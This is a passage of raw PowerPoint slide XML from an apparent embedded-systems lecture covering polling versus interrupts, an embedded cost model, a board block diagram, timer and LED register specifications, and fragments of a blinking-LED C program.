            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>So if the operation is relatively short, polling may actually take less time and less CPU cycles than using interrupts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Polling may have impact on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>power usage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Take those factors into account when designing the hardware and software</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41352660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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hardware / Firmware Interfaces – Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12568941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en-US" smtClean="0"/>
              <a:t>Example – Blinking LED</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118787" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The design board contains a LED</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Write a program that makes the LED blink, so it is ½ a second on, ½ a second off, and so on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3440220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Economic Model</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="1295400"/>
            <a:ext cx="4419600" cy="533400"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Cost = NRE + MC * n</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="1981200"/>
            <a:ext cx="8229600" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="hlink"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Where:</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NRE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = non-recurring engineering = R&amp;D cost (engineering salary</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MC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = manufacturing cost per unit</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n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = number of units manufactured</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="hlink"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>“Classical” software:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="hlink"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>MC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>0, NRE is main cost factor</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Design to lower NRE (object oriented design, debug mechanisms, dynamic memory etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="hlink"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Embedded software:</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MC becomes the main cost factor, especially when n is big</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Design to lower MC, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>sometimes on expense of NRE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> – less hardware hooks, less memory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" kern="0" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29476293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sz="4000" smtClean="0"/>
              <a:t>Board Design Doc – Block Diagram</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="3200400"/>
            <a:ext cx="1219200" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>ARC 605</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22532" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="2057400" y="3429000"/>
            <a:ext cx="2133600" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Memory Controller</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22533" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="4495800"/>
            <a:ext cx="914400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>ROM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22534" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="3429000"/>
            <a:ext cx="914400" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>RAM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22535" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="2438400"/>
            <a:ext cx="914400" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>LED</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22536" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5791200" y="3352800"/>
            <a:ext cx="914400" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Timer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22537" name="AutoShape 11"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="22531" idx="1"/>
            <a:endCxn id="22532" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3352800" y="3657600"/>
            <a:ext cx="6096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38" name="AutoShape 13"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="22532" idx="0"/>
            <a:endCxn id="22535" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2209800" y="2705100"/>
            <a:ext cx="684213" cy="9525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39" name="AutoShape 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="22532" idx="0"/>
            <a:endCxn id="22533" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2209800" y="3657600"/>
            <a:ext cx="684213" cy="10668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40" name="AutoShape 15"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="22532" idx="0"/>
            <a:endCxn id="22534" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2209800" y="3657600"/>
            <a:ext cx="684213" cy="381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41" name="AutoShape 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="22531" idx="3"/>
            <a:endCxn id="22536" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="3657600"/>
            <a:ext cx="6096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801219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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Board Design Doc – LED spec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119811" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The LED is represented by a single register, mapped to address 0x400000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Setting a zero value will turn the LED off; setting a non-zero value will turn the LED on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9364001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6196" name="Group 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="241956897"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="2971800"/>
          <a:ext cx="8229600" cy="2438400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="762000"/>
                <a:gridCol w="1066800"/>
                <a:gridCol w="1676400"/>
                <a:gridCol w="4724400"/>
              </a:tblGrid>
              <a:tr h="750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875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Timer Counter (TCTR):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 bit counter, incremented every clock tick.</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Clock operates at 3.6864 MHz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596" name="Text Box 22"/>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TCTR – Timer Counter Register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>AUX register 0x300</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40443986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8263" name="Group 23"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2234968528"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="2971800"/>
          <a:ext cx="8229600" cy="2488032"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="762000"/>
                <a:gridCol w="1066800"/>
                <a:gridCol w="1676400"/>
                <a:gridCol w="4724400"/>
              </a:tblGrid>
              <a:tr h="75069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3691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Timer Match (TMTCH):</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 bit value set by CPU</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When TCTR value matches the value in this register, an interrupt is asserted on IRQ3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20" name="Text Box 2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TMR0, TMR1, TMR2, TMR3 – Timer Match Registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>AUX register 0x301 – 0x304</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207440655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9340" name="Group 76"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="349389390"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="2590800"/>
          <a:ext cx="8229600" cy="3384552"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="762000"/>
                <a:gridCol w="1066800"/>
                <a:gridCol w="1676400"/>
                <a:gridCol w="4724400"/>
              </a:tblGrid>
              <a:tr h="70117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Reserved</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="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TIER3 – enables interrupt for Timer3</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TIER2 – enables interrupt for Timer2</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TIER1 – enables interrupt for Timer1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TIER0 – enables interrupt for Timer0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64" name="Text Box 2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TIER – Timer Interrupt Enable Register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>AUX register 0x305</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="345288940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41315" name="Group 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="315070901"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="2590800"/>
          <a:ext cx="8229600" cy="3384552"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="762000"/>
                <a:gridCol w="1066800"/>
                <a:gridCol w="1676400"/>
                <a:gridCol w="4724400"/>
              </a:tblGrid>
              <a:tr h="70117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Reserved</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="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Timer3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Timer2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Timer1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Timer0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688" name="Text Box 4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TISR – Timer Interrupt Status Register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>AUX register 0x306</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19376035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smtClean="0"/>
              <a:t>Blinking LED – Main Function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="1600200"/>
            <a:ext cx="7848600" cy="5078413"/>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main()</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>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 0;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Configure the green LED control pin. */ 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ledInit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();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Configure and start the timer. */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timerInit</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(1) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	   if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ledToggle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 0;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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>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37925853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en-US" smtClean="0"/>
              <a:t>Blinking LED – LED.c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
